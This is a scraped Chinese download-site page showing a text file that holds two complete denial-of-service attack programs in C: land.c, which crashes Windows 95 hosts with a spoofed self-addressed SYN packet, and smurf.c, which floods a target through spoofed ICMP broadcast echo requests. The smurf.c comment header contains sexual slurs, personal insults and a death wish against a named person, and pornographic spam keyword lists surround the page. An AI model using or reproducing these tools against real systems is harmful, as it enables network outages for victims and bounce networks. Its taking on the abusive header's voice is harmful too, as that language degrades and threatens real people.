亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 22.txt

?? 測試Win95的機器是否存在的一個SYN漏洞
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
1 Land  

攻擊一臺Win95的機器。這是Win95的一個漏洞,以其IP地址和端口向自  
己的同一個端口發起連接(發SYN),Win95即會崩潰。  


/* land.c by m3lt, FLC  
   crashes a win95 box */  

#include <stdio.h>  
#include <netdb.h>  
#include <arpa/inet.h>  
#include <netinet/in.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include < netinet/ip.h >  
#include < netinet/tcp.h >  

//用于TCP校驗和的偽頭  
struct pseudohdr  
{  
        struct in_addr saddr;  
        struct in_addr daddr;  
        u_char zero;  
        u_char protocol;  
        u_short length;  
        struct tcphdr tcpheader;  
};  

//計算IP校驗和  
u_short checksum(u_short * data,u_short length)  
{  
        register long value;  
        u_short i;  

        for(i=0;i<(length>>1);i++)  
                value+=data[i];  

        if((length&1)==1)  
                value+=(data[i]<<8);  

        value=(value&65535)+(value>>16);  

        return(~value);  
}  


int main(int argc,char * * argv)  
{  
        struct sockaddr_in sin;  
        struct hostent * hoste;  
        int sock;  
        char buffer[40];  
        struct iphdr * ipheader=(struct iphdr *) buffer;  
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));  
        struct pseudohdr pseudoheader;  

        fprintf(stderr,"land.c by m3lt, FLC\n");  

        if(argc<3)  
        {  
                fprintf(stderr,"usage: %s IP port\n",argv[0]);  
                return(-1);  
        }  

        bzero(&sin,sizeof(struct sockaddr_in));  
        sin.sin_family=AF_INET;  

        if((hoste=gethostbyname(argv[1]))!=NULL)  
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);  
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)  
        {  
                fprintf(stderr,"unknown host %s\n",argv[1]);  
                return(-1);  
        }  

        if((sin.sin_port=htons(atoi(argv[2])))==0)  
        {  
                fprintf(stderr,"unknown port %s\n",argv[2]);  
                return(-1);  
        }  

//new一個SOCK—RAW以發偽造IP包 這需要root權限  
        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)  
        {  
                fprintf(stderr,"couldn't allocate raw socket\n");  
                return(-1);  
        }  

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));  
        ipheader->version=4;  
        ipheader->ihl=sizeof(struct iphdr)/4;  
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));  
        ipheader->id=htons(0xF1C);  
        ipheader->ttl=255;  
        ipheader->protocol=IP_TCP;  

//目的IP地址和源IP地址相同  
        ipheader->saddr=sin.sin_addr.s_addr;  
        ipheader->daddr=sin.sin_addr.s_addr;  

//目的TCP端口和源TCPIP端口相同  
        tcpheader->th_sport=sin.sin_port;  
        tcpheader->th_dport=sin.sin_port;  
        tcpheader->th_seq=htonl(0xF1C);  
        tcpheader->th_flags=TH_SYN;  
        tcpheader->th_off=sizeof(struct tcphdr)/4;  
        tcpheader->th_win=htons(2048);  

        bzero(&pseudoheader,12+sizeof(struct tcphdr));  
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;  
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;  
        pseudoheader.protocol=6;  
        pseudoheader.length=htons(sizeof(struct tcphdr));  
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));  
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));  

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),  
  0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)  
        {  
                fprintf(stderr,"couldn't send packet\n");  
                return(-1);  
        }  

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);  

        close(sock);  
        return(0);  
}  


2 Smurf  
     smurf攻擊是很簡單的,它有一些IP(廣播地址)地址列表,發出了一些偽造的數  
據包(ICMP echo request)從而導致一場廣播風暴,可以使受害主機(使它成為偽造包  
的源地址)崩潰。  

    受害者有兩種:中間的設備(bounce sites 交換機或路由器)和被偽裝的IP(那些  
icmp echo的包都被發給它)。這種攻擊依賴于路由器把一個廣播地址轉化為一廣播楨  
(如Ethernet, FF:FF:FF:FF:FF:FF),RFC中允許這種轉換,但在今天看來是不需要的。  

    可以使你router停止轉換第三層的廣播(IP)到第二層的廣播(Ethernet)。  

    但是Smb服務器或NT需要遠程廣播使LAN知道它的存在,但在路由器的上述配置會使這變  
成不可能(沒有WINS服務器時)。  

/*  
 *  
 *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $  
 *  
 *  spoofs icmp packets from a host to various broadcast addresses resulting  
 *  in multiple replies to that host from a single packet.  
 *  
 *  mad head to:  
 *     nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,  
 *     MissSatan for swallowing, napster for pimping my sister, the guy that  
 *     invented vaseline, fyber for trying, knowy, old school #havok, kain  
 *     cos he rox my sox, zuez, toxik, robocod, and everyone else that i might  
 *     have missed (you know who you are).  
 *  
 *     hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy  
 *     thing he is (he's -almost- as stubborn as me, still i managed to pick up  
 *     half the cheque).  
 *  
 *     and a special hi to Todd, face it dude, you're fucking awesome.  
 *  
 *  mad anal to:  
 *     #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps  
 *     because they plain suck, Rolex for being a twit, everyone that  
 *     trades warez, Caren for being a lesbian hoe, AcidKill for being her  
 *     partner, #cha0s, sedriss for having an ego in inverse proportion to  
 *     his penis and anyone that can't pee standing up -- you don't know what  
 *     your missing out on.  
 *  
 *     and anyone thats ripped my code (diff smurf.c axcast.c is rather  
 *     interesting).  
 *  
 *     and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill  
 *     Robbins for trying to steal my girlfriend.  Not only did you show me  
 *     no respect but you're a manipulating prick who tried to take away the  
 *     most important thing in the world to me with no guilt whatsoever, and  
 *     for that I wish you nothing but pain.  Die.  
 *  
 *  disclaimer:  
 *     I cannot and will not be held responsible nor legally bound for the  
 *     malicious activities of individuals who come into possession of this  
 *     program and I refuse to provide help or support of any kind and do NOT  
 *     condone use of this program to deny service to anyone or any machine.  
 *     This is for educational use only. Please Don't abuse this.  
 *  
 *  Well, i really, really, hate this code, but yet here I am creating another  
 *  disgusting version of it.  Odd, indeed.  So why did I write it?  Well, I,  
 *  like most programmers don't like seeing bugs in their code.  I saw a few  
 *  things that should have been done better or needed fixing so I fixed  
 *  them.  -shrug-, programming for me as always seemed to take the pain away  
 *  ...  
 *  
 *  
 */  

#include <signal.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <netinet/in.h>  
#include <netinet/ip.h>  
#include <netinet/ip_icmp.h>  
#include <netdb.h>  
#include <ctype.h>  
#include <arpa/inet.h>  
#include <unistd.h>  
#include <string.h>  

void banner(void);  
void usage(char *);  
void smurf(int, struct sockaddr_in, u_long, int);  
void ctrlc(int);  
unsigned short in_chksum(u_short *, int);  

/* stamp */  
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";  

int main (int argc, char *argv[])  
{  
   struct sockaddr_in sin;  
   struct hostent *he;  
   FILE   *bcastfile;  
   int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;  
   char   buf[32], **bcastaddr = malloc(8192);  

   banner();  
   signal(SIGINT, ctrlc);  

   if (argc < 6) usage(argv[0]);  

   if ((he = gethostbyname(argv[1])) == NULL) {  
      perror("resolving source host");  
      exit(-1);  
   }  
   memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);  
   sin.sin_family = AF_INET;  
   sin.sin_port = htons(0);  

   num = atoi(argv[3]);  
   delay = atoi(argv[4]);  
   pktsize = atoi(argv[5]);  

   if ((bcastfile = fopen(argv[2], "r")) == NULL) {  
      perror("opening bcast file");  
      exit(-1);  
   }  
   x = 0;  
   while (!feof(bcastfile)) {  
      fgets(buf, 32, bcastfile);  
      if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;  
      for (i = 0; i < strlen(buf); i++)  
          if (buf[i] == '\n') buf[i] = '\0';  
      bcastaddr[x] = malloc(32);  
      strcpy(bcastaddr[x], buf);  
      x++;  
   }  
   bcastaddr[x] = 0x0;  
   fclose(bcastfile);  

   if (x == 0) {  
      fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);  
      exit(-1);  
   }  
   if (pktsize > 1024) {  
      fprintf(stderr, "ERROR: packet size must be < 1024\n\n");  
      exit(-1);  
   }  

   if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {  
      perror("getting socket");  
      exit(-1);  
   }  
   setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));  

   printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);  

   for (i = 0; i < num || !num; i++) {  
      if (!(i % 25)) { printf("."); fflush(stdout); }  
      smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);  
      cycle++;  
      if (bcastaddr[cycle] == 0x0) cycle = 0;  
      usleep(delay);  
   }  
   puts("\n\n");  
   return 0;  
}  

void banner (void)  
{  
   puts("\nsmurf.c v4.0 by TFreak\n");  
}  

void usage (char *prog)  
{  
   fprintf(stderr, "usage: %s <target> <bcast file> "  
                   "<num packets> <packet delay> <packet size>\n\n"  
                   "target        = address to hit\n"  
                   "bcast file    = file to read broadcast addresses from\n"  
                   "num packets   = number of packets to send (0 = flood)\n"  
                   "packet delay  = wait between each packet (in ms)\n"  
                   "packet size   = size of packet (< 1024)\n\n", prog);  
   exit(-1);  
}  

void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)  
{  
   struct iphdr *ip;  
   struct icmphdr *icmp;  
   char *packet;  

   packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);  
   ip = (struct iphdr *)packet;  
   icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));  

   memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);  

   ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);  
   ip->ihl = 5;  
   ip->version = 4;  
   ip->ttl = 255;  
   ip->tos = 0;  
   ip->frag_off = 0;  
   ip->protocol = IPPROTO_ICMP;  
   ip->saddr = sin.sin_addr.s_addr;  
   ip->daddr = dest;  
   ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));  
   icmp->type = 8;  
   icmp->code = 0;  
   icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);  

   sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,  
          0, (struct sockaddr *)&sin, sizeof(struct sockaddr));  

   free(packet);           /* free willy! */  
}  

void ctrlc (int ignored)  
{  
   puts("\nDone!\n");  
   exit(1);  

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产视频在线观看一区二区三区| 日本亚洲一区二区| 一区二区三区免费| 亚洲一区二区在线免费观看视频 | 狠狠色2019综合网| 国产精品一区二区黑丝| 91麻豆自制传媒国产之光| 色8久久精品久久久久久蜜| 欧美性xxxxx极品少妇| 欧美精品日韩综合在线| 精品国产区一区| 国产精品免费久久| 一个色综合av| 免费日韩伦理电影| 美国毛片一区二区| 国产综合色在线| 成人一区二区三区视频在线观看| 日本韩国欧美国产| 日韩精品一区二| 欧美激情一区不卡| 亚洲成人777| 国产一区二区三区综合| 99精品欧美一区二区三区综合在线| 日本韩国欧美一区| 欧美日韩高清不卡| 91精品中文字幕一区二区三区| 亚洲精品一区二区三区影院| 国产精品久久久久影院色老大| 亚洲人xxxx| 久久精品国产秦先生| 99精品偷自拍| 日韩一区二区三区免费观看| 久久午夜电影网| 亚洲卡通欧美制服中文| 久久成人久久鬼色| 91免费小视频| 日韩精品一区二区在线观看| 亚洲欧美日韩在线| 久久99精品国产麻豆婷婷洗澡| gogogo免费视频观看亚洲一| 777a∨成人精品桃花网| 久久久久久久久99精品| 亚洲bdsm女犯bdsm网站| 国产91精品一区二区| 欧美福利电影网| 中文字幕中文字幕一区二区| 美国精品在线观看| 欧美四级电影网| 欧美国产丝袜视频| 美女www一区二区| 日本道在线观看一区二区| 日韩视频在线你懂得| 一区二区日韩av| 国产91在线看| 欧美电视剧在线看免费| 亚洲国产日韩av| 北条麻妃国产九九精品视频| 精品国产乱码91久久久久久网站| 亚洲激情中文1区| 国产激情精品久久久第一区二区| 欧美人与禽zozo性伦| 1024成人网色www| 国产成人综合网站| 日韩欧美第一区| 亚洲一卡二卡三卡四卡五卡| 国产精品77777| 91麻豆精品久久久久蜜臀| 亚洲精品高清在线| 国产成人自拍高清视频在线免费播放| 欧美一区二区三区免费观看视频 | 亚洲大片一区二区三区| 国产精品一卡二| 日韩视频免费观看高清完整版在线观看 | 亚洲一区二区三区国产| 成人手机电影网| 久久久久久久久岛国免费| 日韩高清一区二区| 欧美日本一区二区| 亚洲国产综合色| 99精品欧美一区| 久久久影视传媒| 经典三级在线一区| 欧美成人aa大片| 美女视频黄频大全不卡视频在线播放| 欧美网站一区二区| 亚洲午夜成aⅴ人片| 91丨porny丨最新| 中文字幕在线不卡国产视频| 国产999精品久久| 国产女人18毛片水真多成人如厕| 岛国精品在线播放| 欧美成人一区二区三区在线观看| 石原莉奈在线亚洲二区| 欧美日韩在线直播| 亚洲卡通欧美制服中文| 91久久久免费一区二区| 亚洲制服欧美中文字幕中文字幕| 色网综合在线观看| 日韩和欧美的一区| 日韩欧美一区二区免费| 激情欧美一区二区三区在线观看| 精品婷婷伊人一区三区三| 亚洲va欧美va人人爽午夜| 欧美日韩在线播放三区四区| 午夜精品一区在线观看| 欧美日韩成人激情| 日韩电影在线一区| 正在播放亚洲一区| 精品亚洲免费视频| 久久精品一级爱片| 不卡视频一二三| 亚洲尤物视频在线| 91精品国产色综合久久ai换脸| 亚洲综合免费观看高清完整版在线| 99vv1com这只有精品| 夜夜精品视频一区二区| 欧美精品一卡二卡| 精品综合免费视频观看| 精品国产乱码久久| 成人国产一区二区三区精品| 亚洲精品va在线观看| 欧美丰满一区二区免费视频| 美洲天堂一区二卡三卡四卡视频| 2021国产精品久久精品| 成人app软件下载大全免费| 亚洲综合色在线| www精品美女久久久tv| jizzjizzjizz欧美| 久久精品国产久精国产爱| 亚洲色图欧洲色图| 欧美刺激脚交jootjob| 色一情一伦一子一伦一区| 国产在线国偷精品产拍免费yy| 一区二区久久久久| 国产偷国产偷亚洲高清人白洁| 欧美视频一二三区| 成人av资源在线观看| 久久国产精品色| 亚洲一区二区三区四区五区中文 | 日韩不卡手机在线v区| 中文字幕人成不卡一区| 欧美变态tickling挠脚心| 欧美影院一区二区三区| 国产精品77777| 捆绑变态av一区二区三区| 一区二区三区久久久| 欧美国产精品一区| 亚洲精品在线网站| 91精品午夜视频| 欧美主播一区二区三区| av福利精品导航| 国产精一品亚洲二区在线视频| 舔着乳尖日韩一区| 亚洲精品视频自拍| 国产精品久久久久久久久久久免费看| 欧美电视剧在线观看完整版| 欧美日韩在线播放一区| 91蜜桃网址入口| 成人一区二区视频| 国产成人综合在线| 国内偷窥港台综合视频在线播放| 日韩av电影天堂| 午夜久久久影院| 亚洲成av人片在线| 亚洲电影一级片| 亚洲午夜av在线| 亚洲无人区一区| 亚洲综合偷拍欧美一区色| 日韩国产欧美三级| 三级成人在线视频| 午夜精品成人在线视频| 一区二区三区视频在线观看| 亚洲精品日韩综合观看成人91| 国产精品久久精品日日| 国产精品久久久久久妇女6080| 久久久精品日韩欧美| 久久网站热最新地址| 日韩视频中午一区| 日韩精品一区二区三区视频播放| 91精品国产欧美一区二区18| 欧美精品一二三区| 欧美精品在欧美一区二区少妇| 欧美日韩大陆在线| 欧美一区二区三区视频在线观看| 在线播放国产精品二区一二区四区 | www一区二区| 久久伊99综合婷婷久久伊| 久久久精品综合| 国产精品毛片久久久久久| 国产精品免费丝袜| 亚洲日本中文字幕区| 亚洲精品伦理在线| 亚洲制服欧美中文字幕中文字幕| 亚洲图片欧美一区| 琪琪久久久久日韩精品| 国产在线观看一区二区| 成人免费毛片嘿嘿连载视频| 91美女在线看| 欧美精品日韩一区| 精品成人免费观看|